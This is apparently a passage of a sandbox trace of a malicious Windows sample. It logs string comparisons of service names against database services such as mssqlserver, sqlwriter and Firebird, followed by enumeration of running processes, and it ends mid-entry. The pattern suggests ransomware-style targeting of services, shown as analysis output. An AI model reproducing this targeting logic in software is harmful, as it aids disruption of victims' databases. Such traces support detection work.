lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0203.748] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0203.748] lstrlenW (lpString="PcaSvc") returned 6 [0203.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0203.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0203.748] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0203.748] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0203.749] lstrlenW (lpString="PlugPlay") returned 8 [0203.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0203.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0203.749] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0203.749] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0203.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0203.749] lstrlenW (lpString="Power") returned 5 [0203.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0203.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0203.749] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0203.749] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0203.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0203.749] lstrlenW (lpString="ProfSvc") returned 7 [0203.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0203.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0203.749] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0203.749] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0203.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0203.749] lstrlenW (lpString="RpcEptMapper") returned 12 [0203.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0203.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0203.749] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0203.749] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0203.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0203.749] lstrlenW (lpString="RpcSs") returned 5 [0203.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0203.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0203.749] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0203.749] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0203.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0203.749] lstrlenW (lpString="SamSs") returned 5 [0203.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0203.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0203.749] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0203.749] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0203.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0203.749] lstrlenW (lpString="Schedule") returned 8 [0203.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0203.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0203.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0203.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0203.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0203.845] lstrlenW (lpString="SecurityHealthService") returned 21 [0203.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0203.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0203.845] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0203.845] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0203.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0203.845] lstrlenW (lpString="SENS") returned 4 [0203.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0203.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0203.846] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0203.846] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0203.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0203.846] lstrlenW (lpString="ShellHWDetection") returned 16 [0203.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0203.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0203.846] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0203.846] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0203.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0203.846] lstrlenW (lpString="Spooler") returned 7 [0203.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0203.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0203.846] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0203.846] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0203.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0203.846] lstrlenW (lpString="sppsvc") returned 6 [0203.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0203.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0203.846] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0203.846] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0203.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0203.846] lstrlenW (lpString="SSDPSRV") returned 7 [0203.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0203.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0203.846] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0203.846] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0203.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e4 [0204.124] Process32FirstW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.125] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.126] lstrlenW (lpString="System") returned 6 [0204.126] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.126] lstrlenW (lpString="smss.exe") returned 8 [0204.126] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.127] lstrlenW (lpString="csrss.exe") returned 9 [0204.127] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.128] lstrlenW (lpString="wininit.exe") returned 11 [0204.128] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.129] lstrlenW (lpString="csrss.exe") returned 9 [0204.129] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.129] lstrlenW (lpString="winlogon.exe") returned 12 [0204.129] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.130] lstrlenW (lpString="services.exe") returned 12 [0204.130] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.131] lstrlenW (lpString="lsass.exe") returned 9 [0204.131] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.132] lstrlenW (lpString="svchost.exe") returned 11 [0204.132] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0204.132] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0204.132] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0204.133] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0204.133] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.134] lstrlenW (lpString="svchost.exe") returned 11 [0204.134] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.134] lstrlenW (lpString="dwm.exe") returned 7 [0204.135] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.135] lstrlenW (lpString="svchost.exe") returned 11 [0204.135] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.137] lstrlenW (lpString="svchost.exe") returned 11 [0204.137] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.138] lstrlenW (lpString="svchost.exe") returned 11 [0204.138] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.140] lstrlenW (lpString="svchost.exe") returned 11 [0204.140] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.141] lstrlenW (lpString="svchost.exe") returned 11 [0204.141] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.142] lstrlenW (lpString="svchost.exe") returned 11 [0204.142] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.143] lstrlenW (lpString="svchost.exe") returned 11 [0204.143] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.144] lstrlenW (lpString="svchost.exe") returned 11 [0204.144] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.145] lstrlenW (lpString="svchost.exe") returned 11 [0204.145] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.146] lstrlenW (lpString="spoolsv.exe") returned 11 [0204.146] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.147] lstrlenW (lpString="svchost.exe") returned 11 [0204.147] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.148] lstrlenW (lpString="svchost.exe") returned 11 [0204.148] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0204.149] lstrlenW (lpString="audiodg.exe") returned 11 [0204.149] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0204.150] lstrlenW (lpString="sihost.exe") returned 10 [0204.150] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.151] lstrlenW (lpString="svchost.exe") returned 11 [0204.151] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0204.152] lstrlenW (lpString="taskhostw.exe") returned 13 [0204.152] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0204.153] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0204.153] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0204.154] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0204.154] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.155] lstrlenW (lpString="explorer.exe") returned 12 [0204.468] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0204.469] lstrlenW (lpString="Memory Compression") returned 18 [0204.469] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0204.470] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0204.470] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0204.471] lstrlenW (lpString="SearchUI.exe") returned 12 [0204.471] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0204.472] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0204.472] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.473] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0204.473] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0204.474] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0204.474] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0204.475] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0204.475] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0204.476] lstrlenW (lpString="conhost.exe") returned 11 [0204.476] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0204.477] lstrlenW (lpString="roof competitive.exe") returned 20 [0204.477] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0204.478] lstrlenW (lpString="trustees.exe") returned 12 [0204.478] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0204.478] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0204.478] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0204.479] lstrlenW (lpString="isbn.exe") returned 8 [0204.479] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0204.480] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0204.480] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0204.481] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0204.481] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0204.482] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0204.482] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0204.482] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0204.483] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0204.484] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0204.484] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0204.485] lstrlenW (lpString="playstation iraq.exe") returned 20 [0204.485] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0204.486] lstrlenW (lpString="harbor.exe") returned 10 [0204.486] Process32NextW (in: hSnapshot=0x3e4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, 